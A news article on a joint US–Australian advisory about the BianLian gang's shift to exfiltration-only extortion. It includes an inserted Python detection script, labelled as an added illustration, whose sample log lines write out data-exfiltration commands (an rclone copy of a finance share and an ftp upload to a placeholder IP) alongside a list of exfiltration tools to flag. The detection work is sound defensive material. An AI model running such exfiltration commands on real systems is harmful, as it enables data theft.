UPDATED 20:10 EST / MAY 17 2023

Authorities warn BianLian ransomware gang has switched to exfiltration-based extortion

The U.S. Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency and the Australian Cyber Security Centre have issued a joint warning about a well-known ransomware group's change in tactics, from traditional ransomware encryption to exfiltration-based extortion.

The group, called BianLian, is believed to have first emerged in 2021. It came to widespread attention last year when it targeted companies in the U.S., the U.K. and Australia with traditional ransomware attacks, encrypting files and demanding a ransom be paid. It develops its own ransomware and previously used “double-extortion” attacks, meaning that along with encrypting files, it also stole data and threatened to release the stolen data should a payment not be provided.

Fast-forward to today and the group is said to have dropped the file encryption typical of ransomware attacks in favor of data exfiltration-based extortion alone.

The group gains access to victim systems through valid Remote Desktop Protocol credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and then exfiltrates victim data via File Transfer Protocol, Rclone or Mega. Previous BianLian targets included multiple critical infrastructure providers in the U.S. and Australia, as well as victims in the professional services and property development sectors.

Tuesday's joint warning from the FBI, CISA and the ACSC encourages critical infrastructure organizations and small and medium-sized organizations to implement security practices that reduce the likelihood and impact of BianLian and other ransomware incidents.

Recommended mitigations include auditing remote access tools, reviewing logs for the execution of remote access software, using security software to detect instances of remote access, limiting authorized remote access solutions, and blocking both inbound and outbound connections on remote access software ports and protocols.
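As an added illustration of the log-review mitigation above (example code, not from the advisory or from SiliconANGLE), the following Python scans constructed process-creation log lines for execution of the exfiltration tools named earlier (FTP, Rclone, Mega) and flags copies running from user-writable directories. The log format, field names, host and user names, and the tool list are assumptions made for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (simplified Sysmon Event ID 1 style); every name is made up.
SAMPLE_LOGS = [
    '2023-05-16T09:12:03Z host=FS01 user=CORP\\svc_backup image=C:\\Windows\\System32\\svchost.exe cmdline="svchost.exe -k netsvcs"',
    '2023-05-16T09:14:41Z host=FS01 user=CORP\\jdoe image=C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe cmdline="rclone.exe copy D:\\Finance remote:share"',
    '2023-05-16T09:15:02Z host=FS01 user=CORP\\jdoe image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c ftp -s:C:\\Users\\jdoe\\AppData\\Local\\Temp\\up.txt 203.0.113.9"',
    '2023-05-16T09:16:10Z host=FS01 user=CORP\\jdoe image=C:\\Program Files\\MEGAsync\\MEGAsync.exe cmdline="MEGAsync.exe"',
    '2023-05-16T09:20:00Z host=WS07 user=CORP\\alice image=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE cmdline="WINWORD.EXE report.docx"',
]

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
                     r'image=(?P<image>.+?) cmdline="(?P<cmdline>.*)"$')
# Client binaries for the three exfiltration channels the advisory names: FTP, Rclone, Mega.
EXFIL_BINARIES = {"rclone.exe", "ftp.exe", "megasync.exe", "megacmd.exe"}
# The same tools invoked indirectly (e.g. "cmd.exe /c ftp ..."), matched on the command line.
EXFIL_CMDLINE_RE = re.compile(r"(?i)(?<![\w.])(rclone|megasync|megacmd|ftp)(\.exe)?(?=\s|$)")
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\users\\public\\")  # user-writable paths

def parse_event(line):
    """Parse one log line into a dict of fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def classify(event):
    """Return the reasons this event looks like exfiltration tooling (empty list if benign)."""
    reasons = []
    image = event["image"]
    name = PureWindowsPath(image).name.lower()
    if name in EXFIL_BINARIES:
        reasons.append(f"exfil tool executed: {name}")
    elif EXFIL_CMDLINE_RE.search(event["cmdline"]):
        reasons.append(f"exfil tool launched via {name}")
    if reasons and any(d in image.lower() for d in SUSPICIOUS_DIRS):
        reasons.append("binary runs from a user-writable directory")
    return reasons

def scan(lines):
    """Run classify() over raw log lines; returns (ts, host, user, reasons) per hit."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev and (reasons := classify(ev)):
            hits.append((ev["ts"], ev["host"], ev["user"], reasons))
    return hits

for ts, host, user, reasons in scan(SAMPLE_LOGS):
    print(f"{ts} {host} {user}: {'; '.join(reasons)}")
```

Pointing scan() at real process-creation telemetry needs a parser for that source's format; the tool list is a starting point to tune against what is actually sanctioned in the environment.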

“Confirmation that the BianLian group has moved away from delivering ransomware payloads in favor of purely data exfiltration and extortion attacks shows how successful the double extortion strategy is for ransomware groups,” Jon Miller, chief executive officer of anti-ransomware platform provider Halcyon Tech Inc., told SiliconANGLE. “It works so well that we will likely see more groups follow suit and forgo the hassle of developing and managing the encryption and decryption process in favor of a less complicated attack. With data exfiltration as one of the primary tactics employed in today’s multi-stage ransomware attacks, we should really start thinking of these as data extortion attacks with some ransomware thrown into the mix sometimes, as opposed to ransomware attacks that sometimes include data exfil.”

Image: TheDigitalArtist/Pixabay